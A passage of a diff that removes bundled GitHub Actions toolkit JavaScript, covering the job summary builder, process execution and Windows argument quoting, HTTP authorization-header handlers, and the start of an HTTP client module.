} summary instance - */ - write(options) { - return __awaiter(this, void 0, void 0, function* () { - const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); - const filePath = yield this.filePath(); - const writeFunc = overwrite ? writeFile : appendFile; - yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); - return this.emptyBuffer(); - }); - } - /** - * Clears the summary buffer and wipes the summary file - * - * @returns {Summary} summary instance - */ - clear() { - return __awaiter(this, void 0, void 0, function* () { - return this.emptyBuffer().write({ overwrite: true }); - }); - } - /** - * Returns the current summary buffer as a string - * - * @returns {string} string of summary buffer - */ - stringify() { - return this._buffer; - } - /** - * If the summary buffer is empty - * - * @returns {boolen} true if the buffer is empty - */ - isEmptyBuffer() { - return this._buffer.length === 0; - } - /** - * Resets the summary buffer without writing to summary file - * - * @returns {Summary} summary instance - */ - emptyBuffer() { - this._buffer = ''; - return this; - } - /** - * Adds raw text to the summary buffer - * - * @param {string} text content to add - * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) - * - * @returns {Summary} summary instance - */ - addRaw(text, addEOL = false) { - this._buffer += text; - return addEOL ? this.addEOL() : this; - } - /** - * Adds the operating system-specific end-of-line marker to the buffer - * - * @returns {Summary} summary instance - */ - addEOL() { - return this.addRaw(os_1.EOL); - } - /** - * Adds an HTML codeblock to the summary buffer - * - * @param {string} code content to render within fenced code block - * @param {string} lang (optional) language to syntax highlight code - * - * @returns {Summary} summary instance - */ - addCodeBlock(code, lang) { - const attrs = Object.assign({}, (lang && { lang })); - const element = this.wrap('pre', this.wrap('code', code), attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML list to the summary buffer - * - * @param {string[]} items list of items to render - * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) - * - * @returns {Summary} summary instance - */ - addList(items, ordered = false) { - const tag = ordered ? 'ol' : 'ul'; - const listItems = items.map(item => this.wrap('li', item)).join(''); - const element = this.wrap(tag, listItems); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML table to the summary buffer - * - * @param {SummaryTableCell[]} rows table rows - * - * @returns {Summary} summary instance - */ - addTable(rows) { - const tableBody = rows - .map(row => { - const cells = row - .map(cell => { - if (typeof cell === 'string') { - return this.wrap('td', cell); - } - const { header, data, colspan, rowspan } = cell; - const tag = header ? 'th' : 'td'; - const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); - return this.wrap(tag, data, attrs); - }) - .join(''); - return this.wrap('tr', cells); - }) - .join(''); - const element = this.wrap('table', tableBody); - return this.addRaw(element).addEOL(); - } - /** - * Adds a collapsable HTML details element to the summary buffer - * - * @param {string} label text for the closed state - * @param {string} content collapsable content - * - * @returns {Summary} summary instance - */ - addDetails(label, content) { - const element = this.wrap('details', this.wrap('summary', label) + content); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML image tag to the summary buffer - * - * @param {string} src path to the image you to embed - * @param {string} alt text description of the image - * @param {SummaryImageOptions} options (optional) addition image attributes - * - * @returns {Summary} summary instance - */ - addImage(src, alt, options) { - const { width, height } = options || {}; - const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); - const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML section heading element - * - * @param {string} text heading text - * @param {number | string} [level=1] (optional) the heading level, default: 1 - * - * @returns {Summary} summary instance - */ - addHeading(text, level) { - const tag = `h${level}`; - const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) - ? tag - : 'h1'; - const element = this.wrap(allowedTag, text); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML thematic break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addSeparator() { - const element = this.wrap('hr', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML line break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addBreak() { - const element = this.wrap('br', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML blockquote to the summary buffer - * - * @param {string} text quote text - * @param {string} cite (optional) citation url - * - * @returns {Summary} summary instance - */ - addQuote(text, cite) { - const attrs = Object.assign({}, (cite && { cite })); - const element = this.wrap('blockquote', text, attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML anchor tag to the summary buffer - * - * @param {string} text link text/content - * @param {string} href hyperlink - * - * @returns {Summary} summary instance - */ - addLink(text, href) { - const element = this.wrap('a', text, { href }); - return this.addRaw(element).addEOL(); - } -} -const _summary = new Summary(); -/** - * @deprecated use `core.summary` - */ -exports.markdownSummary = _summary; -exports.summary = _summary; -//# sourceMappingURL=summary.js.map - -/***/ }), - -/***/ 5278: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toCommandProperties = exports.toCommandValue = void 0; -/** - * Sanitizes an input into a string so it can be passed into issueCommand safely - * @param input input to sanitize into a string - */ -function toCommandValue(input) { - if (input === null || input === undefined) { - return ''; - } - else if (typeof input === 'string' || input instanceof String) { - return input; - } - return JSON.stringify(input); -} -exports.toCommandValue = toCommandValue; -/** - * - * @param annotationProperties - * @returns The command properties to send with the actual annotation command - * See IssueCommandProperties: https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 - */ -function toCommandProperties(annotationProperties) { - if (!Object.keys(annotationProperties).length) { - return {}; - } - return { - title: annotationProperties.title, - file: annotationProperties.file, - line: annotationProperties.startLine, - endLine: annotationProperties.endLine, - col: annotationProperties.startColumn, - endColumn: annotationProperties.endColumn - }; -} -exports.toCommandProperties = toCommandProperties; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 1514: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getExecOutput = exports.exec = void 0; -const string_decoder_1 = __nccwpck_require__(1576); -const tr = __importStar(__nccwpck_require__(8159)); -/** - * Exec a command. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code - */ -function exec(commandLine, args, options) { - return __awaiter(this, void 0, void 0, function* () { - const commandArgs = tr.argStringToArray(commandLine); - if (commandArgs.length === 0) { - throw new Error(`Parameter 'commandLine' cannot be null or empty.`); - } - // Path to tool to execute should be first arg - const toolPath = commandArgs[0]; - args = commandArgs.slice(1).concat(args || []); - const runner = new tr.ToolRunner(toolPath, args, options); - return runner.exec(); - }); -} -exports.exec = exec; -/** - * Exec a command and get the output. - * Output will be streamed to the live console. - * Returns promise with the exit code and collected stdout and stderr - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code, stdout, and stderr - */ -function getExecOutput(commandLine, args, options) { - var _a, _b; - return __awaiter(this, void 0, void 0, function* () { - let stdout = ''; - let stderr = ''; - //Using string decoder covers the case where a mult-byte character is split - const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); - const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); - const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; - const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; - const stdErrListener = (data) => { - stderr += stderrDecoder.write(data); - if (originalStdErrListener) { - originalStdErrListener(data); - } - }; - const stdOutListener = (data) => { - stdout += stdoutDecoder.write(data); - if (originalStdoutListener) { - originalStdoutListener(data); - } - }; - const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); - const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); - //flush any remaining characters - stdout += stdoutDecoder.end(); - stderr += stderrDecoder.end(); - return { - exitCode, - stdout, - stderr - }; - }); -} -exports.getExecOutput = getExecOutput; -//# sourceMappingURL=exec.js.map - -/***/ }), - -/***/ 8159: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.argStringToArray = exports.ToolRunner = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const events = __importStar(__nccwpck_require__(2361)); -const child = __importStar(__nccwpck_require__(2081)); -const path = __importStar(__nccwpck_require__(1017)); -const io = __importStar(__nccwpck_require__(7436)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -const timers_1 = __nccwpck_require__(9512); -/* eslint-disable @typescript-eslint/unbound-method */ -const IS_WINDOWS = process.platform === 'win32'; -/* - * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. - */ -class ToolRunner extends events.EventEmitter { - constructor(toolPath, args, options) { - super(); - if (!toolPath) { - throw new Error("Parameter 'toolPath' cannot be null or empty."); - } - this.toolPath = toolPath; - this.args = args || []; - this.options = options || {}; - } - _debug(message) { - if (this.options.listeners && this.options.listeners.debug) { - this.options.listeners.debug(message); - } - } - _getCommandString(options, noPrefix) { - const toolPath = this._getSpawnFileName(); - const args = this._getSpawnArgs(options); - let cmd = noPrefix ? '' : '[command]'; // omit prefix when piped to a second tool - if (IS_WINDOWS) { - // Windows + cmd file - if (this._isCmdFile()) { - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows + verbatim - else if (options.windowsVerbatimArguments) { - cmd += `"${toolPath}"`; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows (regular) - else { - cmd += this._windowsQuoteCmdArg(toolPath); - for (const a of args) { - cmd += ` ${this._windowsQuoteCmdArg(a)}`; - } - } - } - else { - // OSX/Linux - this can likely be improved with some form of quoting. - // creating processes on Unix is fundamentally different than Windows. - // on Unix, execvp() takes an arg array. - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - return cmd; - } - _processLineBuffer(data, strBuffer, onLine) { - try { - let s = strBuffer + data.toString(); - let n = s.indexOf(os.EOL); - while (n > -1) { - const line = s.substring(0, n); - onLine(line); - // the rest of the string ... - s = s.substring(n + os.EOL.length); - n = s.indexOf(os.EOL); - } - return s; - } - catch (err) { - // streaming lines to console is best effort. Don't fail a build. - this._debug(`error processing line. Failed with error ${err}`); - return ''; - } - } - _getSpawnFileName() { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - return process.env['COMSPEC'] || 'cmd.exe'; - } - } - return this.toolPath; - } - _getSpawnArgs(options) { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; - for (const a of this.args) { - argline += ' '; - argline += options.windowsVerbatimArguments - ? a - : this._windowsQuoteCmdArg(a); - } - argline += '"'; - return [argline]; - } - } - return this.args; - } - _endsWith(str, end) { - return str.endsWith(end); - } - _isCmdFile() { - const upperToolPath = this.toolPath.toUpperCase(); - return (this._endsWith(upperToolPath, '.CMD') || - this._endsWith(upperToolPath, '.BAT')); - } - _windowsQuoteCmdArg(arg) { - // for .exe, apply the normal quoting rules that libuv applies - if (!this._isCmdFile()) { - return this._uvQuoteCmdArg(arg); - } - // otherwise apply quoting rules specific to the cmd.exe command line parser. - // the libuv rules are generic and are not designed specifically for cmd.exe - // command line parser. - // - // for a detailed description of the cmd.exe command line parser, refer to - // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 - // need quotes for empty arg - if (!arg) { - return '""'; - } - // determine whether the arg needs to be quoted - const cmdSpecialChars = [ - ' ', - '\t', - '&', - '(', - ')', - '[', - ']', - '{', - '}', - '^', - '=', - ';', - '!', - "'", - '+', - ',', - '`', - '~', - '|', - '<', - '>', - '"' - ]; - let needsQuotes = false; - for (const char of arg) { - if (cmdSpecialChars.some(x => x === char)) { - needsQuotes = true; - break; - } - } - // short-circuit if quotes not needed - if (!needsQuotes) { - return arg; - } - // the following quoting rules are very similar to the rules that by libuv applies. - // - // 1) wrap the string in quotes - // - // 2) double-up quotes - i.e. " => "" - // - // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately - // doesn't work well with a cmd.exe command line. - // - // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. - // for example, the command line: - // foo.exe "myarg:""my val""" - // is parsed by a .NET console app into an arg array: - // [ "myarg:\"my val\"" ] - // which is the same end result when applying libuv quoting rules. although the actual - // command line from libuv quoting rules would look like: - // foo.exe "myarg:\"my val\"" - // - // 3) double-up slashes that precede a quote, - // e.g. hello \world => "hello \world" - // hello\"world => "hello\\""world" - // hello\\"world => "hello\\\\""world" - // hello world\ => "hello world\\" - // - // technically this is not required for a cmd.exe command line, or the batch argument parser. - // the reasons for including this as a .cmd quoting rule are: - // - // a) this is optimized for the scenario where the argument is passed from the .cmd file to an - // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. - // - // b) it's what we've been doing previously (by deferring to node default behavior) and we - // haven't heard any complaints about that aspect. - // - // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be - // escaped when used on the command line directly - even though within a .cmd file % can be escaped - // by using %%. - // - // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts - // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. - // - // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would - // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the - // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args - // to an external program. - // - // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. - // % can be escaped within a .cmd file. - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; // double the slash - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '"'; // double the quote - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _uvQuoteCmdArg(arg) { - // Tool runner wraps child_process.spawn() and needs to apply the same quoting as - // Node in certain cases where the undocumented spawn option windowsVerbatimArguments - // is used. - // - // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, - // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), - // pasting copyright notice from Node within this function: - // - // Copyright Joyent, Inc. and other Node contributors. All rights reserved. - // - // Permission is hereby granted, free of charge, to any person obtaining a copy - // of this software and associated documentation files (the "Software"), to - // deal in the Software without restriction, including without limitation the - // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - // sell copies of the Software, and to permit persons to whom the Software is - // furnished to do so, subject to the following conditions: - // - // The above copyright notice and this permission notice shall be included in - // all copies or substantial portions of the Software. - // - // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - // IN THE SOFTWARE. - if (!arg) { - // Need double quotation for empty argument - return '""'; - } - if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { - // No quotation needed - return arg; - } - if (!arg.includes('"') && !arg.includes('\\')) { - // No embedded double quotes or backslashes, so I can just wrap - // quote marks around the whole thing. - return `"${arg}"`; - } - // Expected input/output: - // input : hello"world - // output: "hello\"world" - // input : hello""world - // output: "hello\"\"world" - // input : hello\world - // output: hello\world - // input : hello\\world - // output: hello\\world - // input : hello\"world - // output: "hello\\\"world" - // input : hello\\"world - // output: "hello\\\\\"world" - // input : hello world\ - // output: "hello world\\" - note the comment in libuv actually reads "hello world\" - // but it appears the comment is wrong, it should be "hello world\\" - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '\\'; - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _cloneExecOptions(options) { - options = options || {}; - const result = { - cwd: options.cwd || process.cwd(), - env: options.env || process.env, - silent: options.silent || false, - windowsVerbatimArguments: options.windowsVerbatimArguments || false, - failOnStdErr: options.failOnStdErr || false, - ignoreReturnCode: options.ignoreReturnCode || false, - delay: options.delay || 10000 - }; - result.outStream = options.outStream || process.stdout; - result.errStream = options.errStream || process.stderr; - return result; - } - _getSpawnOptions(options, toolPath) { - options = options || {}; - const result = {}; - result.cwd = options.cwd; - result.env = options.env; - result['windowsVerbatimArguments'] = - options.windowsVerbatimArguments || this._isCmdFile(); - if (options.windowsVerbatimArguments) { - result.argv0 = `"${toolPath}"`; - } - return result; - } - /** - * Exec a tool. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param tool path to tool to exec - * @param options optional exec options. See ExecOptions - * @returns number - */ - exec() { - return __awaiter(this, void 0, void 0, function* () { - // root the tool path if it is unrooted and contains relative pathing - if (!ioUtil.isRooted(this.toolPath) && - (this.toolPath.includes('/') || - (IS_WINDOWS && this.toolPath.includes('\\')))) { - // prefer options.cwd if it is specified, however options.cwd may also need to be rooted - this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); - } - // if the tool is only a file name, then resolve it from the PATH - // otherwise verify it exists (add extension on Windows if necessary) - this.toolPath = yield io.which(this.toolPath, true); - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - this._debug(`exec tool: ${this.toolPath}`); - this._debug('arguments:'); - for (const arg of this.args) { - this._debug(` ${arg}`); - } - const optionsNonNull = this._cloneExecOptions(this.options); - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); - } - const state = new ExecState(optionsNonNull, this.toolPath); - state.on('debug', (message) => { - this._debug(message); - }); - if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { - return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); - } - const fileName = this._getSpawnFileName(); - const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); - let stdbuffer = ''; - if (cp.stdout) { - cp.stdout.on('data', (data) => { - if (this.options.listeners && this.options.listeners.stdout) { - this.options.listeners.stdout(data); - } - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(data); - } - stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { - if (this.options.listeners && this.options.listeners.stdline) { - this.options.listeners.stdline(line); - } - }); - }); - } - let errbuffer = ''; - if (cp.stderr) { - cp.stderr.on('data', (data) => { - state.processStderr = true; - if (this.options.listeners && this.options.listeners.stderr) { - this.options.listeners.stderr(data); - } - if (!optionsNonNull.silent && - optionsNonNull.errStream && - optionsNonNull.outStream) { - const s = optionsNonNull.failOnStdErr - ? optionsNonNull.errStream - : optionsNonNull.outStream; - s.write(data); - } - errbuffer = this._processLineBuffer(data, errbuffer, (line) => { - if (this.options.listeners && this.options.listeners.errline) { - this.options.listeners.errline(line); - } - }); - }); - } - cp.on('error', (err) => { - state.processError = err.message; - state.processExited = true; - state.processClosed = true; - state.CheckComplete(); - }); - cp.on('exit', (code) => { - state.processExitCode = code; - state.processExited = true; - this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); - state.CheckComplete(); - }); - cp.on('close', (code) => { - state.processExitCode = code; - state.processExited = true; - state.processClosed = true; - this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); - state.CheckComplete(); - }); - state.on('done', (error, exitCode) => { - if (stdbuffer.length > 0) { - this.emit('stdline', stdbuffer); - } - if (errbuffer.length > 0) { - this.emit('errline', errbuffer); - } - cp.removeAllListeners(); - if (error) { - reject(error); - } - else { - resolve(exitCode); - } - }); - if (this.options.input) { - if (!cp.stdin) { - throw new Error('child process missing stdin'); - } - cp.stdin.end(this.options.input); - } - })); - }); - } -} -exports.ToolRunner = ToolRunner; -/** - * Convert an arg string to an array of args. Handles escaping - * - * @param argString string of arguments - * @returns string[] array of arguments - */ -function argStringToArray(argString) { - const args = []; - let inQuotes = false; - let escaped = false; - let arg = ''; - function append(c) { - // we only escape double quotes. - if (escaped && c !== '"') { - arg += '\\'; - } - arg += c; - escaped = false; - } - for (let i = 0; i < argString.length; i++) { - const c = argString.charAt(i); - if (c === '"') { - if (!escaped) { - inQuotes = !inQuotes; - } - else { - append(c); - } - continue; - } - if (c === '\\' && escaped) { - append(c); - continue; - } - if (c === '\\' && inQuotes) { - escaped = true; - continue; - } - if (c === ' ' && !inQuotes) { - if (arg.length > 0) { - args.push(arg); - arg = ''; - } - continue; - } - append(c); - } - if (arg.length > 0) { - args.push(arg.trim()); - } - return args; -} -exports.argStringToArray = argStringToArray; -class ExecState extends events.EventEmitter { - constructor(options, toolPath) { - super(); - this.processClosed = false; // tracks whether the process has exited and stdio is closed - this.processError = ''; - this.processExitCode = 0; - this.processExited = false; // tracks whether the process has exited - this.processStderr = false; // tracks whether stderr was written to - this.delay = 10000; // 10 seconds - this.done = false; - this.timeout = null; - if (!toolPath) { - throw new Error('toolPath must not be empty'); - } - this.options = options; - this.toolPath = toolPath; - if (options.delay) { - this.delay = options.delay; - } - } - CheckComplete() { - if (this.done) { - return; - } - if (this.processClosed) { - this._setResult(); - } - else if (this.processExited) { - this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); - } - } - _debug(message) { - this.emit('debug', message); - } - _setResult() { - // determine whether there is an error - let error; - if (this.processExited) { - if (this.processError) { - error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. Error: ${this.processError}`); - } - else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { - error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); - } - else if (this.processStderr && this.options.failOnStdErr) { - error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); - } - } - // clear the timeout - if (this.timeout) { - clearTimeout(this.timeout); - this.timeout = null; - } - this.done = true; - this.emit('done', error, this.processExitCode); - } - static HandleTimeout(state) { - if (state.done) { - return; - } - if (!state.processClosed && state.processExited) { - const message = `The STDIO streams did not close within ${state.delay / - 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; - state._debug(message); - } - state._setResult(); - } -} -//# sourceMappingURL=toolrunner.js.map - -/***/ }), - -/***/ 5526: -/***/ (function(__unused_webpack_module, exports) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; -class BasicCredentialHandler { - constructor(username, password) { - this.username = username; - this.password = password; - } - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BasicCredentialHandler = BasicCredentialHandler; -class BearerCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Bearer ${this.token}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BearerCredentialHandler = BearerCredentialHandler; -class PersonalAccessTokenCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`PAT:${this.token}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; -//# sourceMappingURL=auth.js.map - -/***/ }), - -/***/ 6255: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -/* eslint-disable @typescript-eslint/no-explicit-any */ -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; -const http = __importStar(__nccwpck_require__(3685)); -const https = __importStar(__nccwpck_require__(5687)); -const pm = __importStar(__nccwpck_require__(9835)); -const tunnel = __importStar(__nccwpck_require__(4294)); -const undici_1 = __nccwpck_require__(1773); -var HttpCodes; -(function (HttpCodes) { 